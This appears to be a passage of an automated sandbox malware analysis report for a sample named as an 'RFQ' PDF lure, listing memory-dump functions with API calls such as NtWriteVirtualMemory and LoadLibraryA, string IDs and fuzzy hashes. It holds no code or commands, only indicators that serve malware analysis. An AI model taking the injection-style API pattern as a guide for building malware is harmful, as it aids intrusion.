                              • Instruction Fuzzy Hash: 7762FFB2604349DFDB759F29CD947EABBB2FF95300F15811ADC899B224C3309A81DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                              • NtProtectVirtualMemory.NTDLL(000000B6,?,?,?,?,020BDD20), ref: 020BEB7A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: MemoryProtectVirtual
                              • String ID: DHcL$i"m$k,I5
                              • API String ID: 2706961497-2585089168
                              • Opcode ID: 803da07c64ff71d32f15a39f48333c16e07bae84ee3e0416ff8398ba6568e068
                              • Instruction ID: f360afbfcbb0e9d9d9db96f6f9aff64f6d9bc33d62b9f1a6fd87d051d07d4738
                              • Opcode Fuzzy Hash: 803da07c64ff71d32f15a39f48333c16e07bae84ee3e0416ff8398ba6568e068
                              • Instruction Fuzzy Hash: 0272FEB2604349DFDB759F28CC847EABBB6FF95310F55811ADC899B224D3309A81DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateMemoryVirtual
                              • String ID: DHcL$i"m$k,I5$ystemRoot\System32\DRIVERS\srvnet.sys
                              • API String ID: 2167126740-1856495640
                              • Opcode ID: bc5dbe27f60a265f0e72b85bd8cbff86cb26086fe860c027cfe4aeef5837d612
                              • Instruction ID: 069fd761b747b96f60d1119da1dee0e19d66411aa4335eebc41972c53a7fbe02
                              • Opcode Fuzzy Hash: bc5dbe27f60a265f0e72b85bd8cbff86cb26086fe860c027cfe4aeef5837d612
                              • Instruction Fuzzy Hash: DB620F72604349DFDB759F29CD847DABBB6FF95310F55812ADC899B224C3308A81DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: DHcL$i"m$k,I5
                              • API String ID: 0-2585089168
                              • Opcode ID: d161dd60d3aa6c58ceab7760c94ba79529b122ff0ba0066bdc7c0a96ede361ca
                              • Instruction ID: a7e19f21dc2edbc5e3bb57f251e8f268f4805e9117cd77ea9c5f803fc615d077
                              • Opcode Fuzzy Hash: d161dd60d3aa6c58ceab7760c94ba79529b122ff0ba0066bdc7c0a96ede361ca
                              • Instruction Fuzzy Hash: 2F52FEB2604349DFDB759F29CD847DABBB6FF95300F55812ADC899B224C3309A81DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: DHcL$i"m$k,I5
                              • API String ID: 0-2585089168
                              • Opcode ID: 48f7733e41bc305b23fbf4e50574edbd11dfbd413ff67ea76fbdee8dfe611e2a
                              • Instruction ID: 114de8db5c5f97ff6ca33013507672ff44ed525b7be96cc8e7a68eca625b2942
                              • Opcode Fuzzy Hash: 48f7733e41bc305b23fbf4e50574edbd11dfbd413ff67ea76fbdee8dfe611e2a
                              • Instruction Fuzzy Hash: 3752FEB2604349DFDB759F29CD847DABBB6FF95300F55812ADC899B224C3309A81DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: DHcL$i"m$k,I5
                              • API String ID: 0-2585089168
                              • Opcode ID: 42c213b5ead505d04c30300027bcbf9502631cdf29f608f8375a5d38de28c0d0
                              • Instruction ID: fc90854eba156434d176c8f823fed442a01783ae840288e1b6fa0709c6b2f60b
                              • Opcode Fuzzy Hash: 42c213b5ead505d04c30300027bcbf9502631cdf29f608f8375a5d38de28c0d0
                              • Instruction Fuzzy Hash: 7A52FEB2604349DFDB759F29CD847DABBB6FF95300F55812ADC899B224C3309A81DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              • LoadLibraryA.KERNELBASE(?), ref: 020BBCE5
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: LibraryLoadMemoryVirtualWrite
                              • String ID: DHcL$i"m$k,I5
                              • API String ID: 3569954152-2585089168
                              • Opcode ID: 20b126e1680cad97ac7a464efb94d5641e89212dc4b90ef9f2aa071cbecaef1c
                              • Instruction ID: 3a8199c8a87e88593bc6e9770a209bf5a382f0e095e3d2107b1cedb5892778c4
                              • Opcode Fuzzy Hash: 20b126e1680cad97ac7a464efb94d5641e89212dc4b90ef9f2aa071cbecaef1c
                              • Instruction Fuzzy Hash: C2520EB2604349DFDB759F29CD847DABBB6FF95300F55812ADC899B224C3309A81DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              • LoadLibraryA.KERNELBASE(?), ref: 020BBCE5
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: LibraryLoadMemoryVirtualWrite
                              • String ID: DHcL$i"m$k,I5
                              • API String ID: 3569954152-2585089168
                              • Opcode ID: ca20578a3ec653d3610c20cb37d3a92a72e6c9a20fd83a2f7333429b87f2cabd
                              • Instruction ID: 4ad419ca8e701db406ef57291f5535e175beff1ea56fec5a9df7509b91f0ce76
                              • Opcode Fuzzy Hash: ca20578a3ec653d3610c20cb37d3a92a72e6c9a20fd83a2f7333429b87f2cabd
                              • Instruction Fuzzy Hash: 2E52FDB2604349DFDB759F29CD847DABBB6FF95300F55812ADC899B224C3309A81DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              • LoadLibraryA.KERNELBASE(?), ref: 020BBCE5
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: LibraryLoadMemoryVirtualWrite
                              • String ID: DHcL$i"m$k,I5
                              • API String ID: 3569954152-2585089168
                              • Opcode ID: 6137ba8beb5d425fec5cb227dca78656f72fe2713a275efb5543e7522ba9b67a
                              • Instruction ID: 8fb88cdb2042e980310e1935e7686751621ffc4a26a3e51a2d1923b1da18aec2
                              • Opcode Fuzzy Hash: 6137ba8beb5d425fec5cb227dca78656f72fe2713a275efb5543e7522ba9b67a
                              • Instruction Fuzzy Hash: 4A52FEB2604349DFDB759F29CD847DABBB6FF95300F55812ADC899B224C3309A81DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: DHcL$i"m$k,I5
                              • API String ID: 0-2585089168
                              • Opcode ID: e1156558954b63255f036f096994e7307497995cdf2d42d9cec2e341043dd5d5
                              • Instruction ID: 2cc9dd8c92ebbecc84615ce7c60c4b573da0c5c72ba91289a8508bb429439e46
                              • Opcode Fuzzy Hash: e1156558954b63255f036f096994e7307497995cdf2d42d9cec2e341043dd5d5
                              • Instruction Fuzzy Hash: 9F52FEB2604349DFDB759F29CD847DABBB6FF95300F55812ADC899B224C3309A81DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              • LoadLibraryA.KERNELBASE(?), ref: 020BBCE5
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: LibraryLoadMemoryVirtualWrite
                              • String ID: DHcL$i"m$k,I5
                              • API String ID: 3569954152-2585089168
                              • Opcode ID: 1e4058340c9039560c4a26737fb0fba86d5f10e99683c9f3f484c1755f3e44d8
                              • Instruction ID: 577d4fac52316c382c7181b908aabca36fe805b0599965f08c9ea7c638ad77d9
                              • Opcode Fuzzy Hash: 1e4058340c9039560c4a26737fb0fba86d5f10e99683c9f3f484c1755f3e44d8
                              • Instruction Fuzzy Hash: 3852FEB2604349DFDB759F29CD847DABBB6FF95300F55812ADC899B224C3309A81DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: DHcL$i"m$k,I5
                              • API String ID: 0-2585089168
                              • Opcode ID: 9166106d63c788b3d0e39a05e6259fe2ec0a2e0105d96ff38dc0bcbd43db0199
                              • Instruction ID: dbb0d15971db3eef0b821143a33b3bafa9043802fbff8b342f14a854009eb9a8
                              • Opcode Fuzzy Hash: 9166106d63c788b3d0e39a05e6259fe2ec0a2e0105d96ff38dc0bcbd43db0199
                              • Instruction Fuzzy Hash: A352EDB2604349DFDB759F29CD847DABBB6FF95300F55812ADC899B224C3309A81DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: DHcL$i"m$k,I5
                              • API String ID: 0-2585089168
                              • Opcode ID: cbb4b43df01100c326054e8ea1a7859f4158e457f499b75db382be7d4f2c3bb2
                              • Instruction ID: 6ceb5ba58019c8d93237772a9c54b0d66ac0c343f19cc6934ef56b5606de1d83
                              • Opcode Fuzzy Hash: cbb4b43df01100c326054e8ea1a7859f4158e457f499b75db382be7d4f2c3bb2
                              • Instruction Fuzzy Hash: BC52EEB2604349DFDB759F29CD847DABBB6FF95300F55812ADC899B224C3309A81DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: DHcL$i"m$k,I5
                              • API String ID: 0-2585089168
                              • Opcode ID: 95ed4f693ae3d6700274f89edcdf9b5b5185d306e0631e41ccf04dd91e16ab62
                              • Instruction ID: f0e9f181efbb020898ff7e7d948d3cc203736b21ccc57abb95e7feb50f9d3d2e
                              • Opcode Fuzzy Hash: 95ed4f693ae3d6700274f89edcdf9b5b5185d306e0631e41ccf04dd91e16ab62
                              • Instruction Fuzzy Hash: 7F52FEB2604349DFDB759F29CD847DABBB6FF95300F55812ADC899B224C3309A81DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: DHcL$i"m$k,I5
                              • API String ID: 0-2585089168
                              • Opcode ID: aa984c7365ea985de5c9ee7ec11bdb8367f2a005d80cc1ce35c1eb57770c294c
                              • Instruction ID: 27887d7fff6dad5ced898b7adeb0e78704a4ca91f9f576ddd1d28b0eea4045ec
                              • Opcode Fuzzy Hash: aa984c7365ea985de5c9ee7ec11bdb8367f2a005d80cc1ce35c1eb57770c294c
                              • Instruction Fuzzy Hash: C852FEB2604349DFDB759F29CD847DABBB6FF95300F55812ADC899B224C3309A81DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              • LoadLibraryA.KERNELBASE(?), ref: 020BBCE5
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: LibraryLoadMemoryVirtualWrite
                              • String ID: DHcL$i"m$k,I5
                              • API String ID: 3569954152-2585089168
                              • Opcode ID: d4e815ac1db29d71e76729eb811c7bce3b40173516b1b11d436e9289fa53904c
                              • Instruction ID: 78763811288b1acf40a6235631adbd392d06bff777bd0bf00318fb0d907e4591
                              • Opcode Fuzzy Hash: d4e815ac1db29d71e76729eb811c7bce3b40173516b1b11d436e9289fa53904c
                              • Instruction Fuzzy Hash: 4152FF72604349DFDB759F29CD847DABBB6FF95300F55812ADC899B220C3309A81DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: DHcL$i"m$k,I5
                              • API String ID: 0-2585089168
                              • Opcode ID: 10d46c5460764ed031d88e22376875577556e7ce722067b4b108026e30e5315e
                              • Instruction ID: e98c7d1b7061b23ec132f24f5de77c22fcd32273084e3ae30d0261b148a0bd04
                              • Opcode Fuzzy Hash: 10d46c5460764ed031d88e22376875577556e7ce722067b4b108026e30e5315e
                              • Instruction Fuzzy Hash: EA52FF72604349DFDB759F29CD847EABBB6FF95300F55812ADC899B220C3309A81DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: DHcL$i"m$k,I5
                              • API String ID: 0-2585089168
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: DHcL$i"m$k,I5
                              • API String ID: 0-2585089168
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: DHcL$i"m$k,I5
                              • API String ID: 0-2585089168
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: DHcL$i"m$k,I5
                              • API String ID: 0-2585089168
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: DHcL$i"m$k,I5
                              • API String ID: 0-2585089168
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: DHcL$i"m$k,I5
                              • API String ID: 0-2585089168
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: DHcL$i"m$k,I5
                              • API String ID: 0-2585089168
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              • LoadLibraryA.KERNELBASE(?), ref: 020BBCE5
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: LibraryLoadMemoryVirtualWrite
                              • String ID: DHcL$i"m$k,I5
                              • API String ID: 3569954152-2585089168
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 020BBAE2: LoadLibraryA.KERNELBASE(?), ref: 020BBCE5
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: LibraryLoadMemoryVirtualWrite
                              • String ID: DHcL$i"m$k,I5
                              • API String ID: 3569954152-2585089168
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: DHcL$i"m$k,I5
                              • API String ID: 0-2585089168
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: DHcL$i"m$k,I5
                              • API String ID: 0-2585089168
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: DHcL$i"m$k,I5
                              • API String ID: 0-2585089168
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: DHcL$i"m$k,I5
                              • API String ID: 0-2585089168
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: DHcL$i"m$k,I5
                              • API String ID: 0-2585089168
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: DHcL$i"m$k,I5
                              • API String ID: 0-2585089168
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: DHcL$i"m$k,I5
                              • API String ID: 0-2585089168
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: DHcL$i"m$k,I5
                              • API String ID: 0-2585089168
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: DHcL$i"m$k,I5
                              • API String ID: 0-2585089168
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: DHcL$i"m$k,I5
                              • API String ID: 0-2585089168
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: DHcL$i"m$k,I5
                              • API String ID: 0-2585089168
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: i"m$k,I5
                              • API String ID: 0-782811531
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID: i"m$k,I5
                              • API String ID: 3527976591-782811531
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: i"m$k,I5
                              • API String ID: 0-782811531
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID: i"m$k,I5
                              • API String ID: 3527976591-782811531
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: i"m$k,I5
                              • API String ID: 0-782811531
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: i"m$k,I5
                              • API String ID: 0-782811531
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: i"m$k,I5
                              • API String ID: 0-782811531
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: i"m$k,I5
                              • API String ID: 0-782811531
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: i"m$k,I5
                              • API String ID: 0-782811531
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
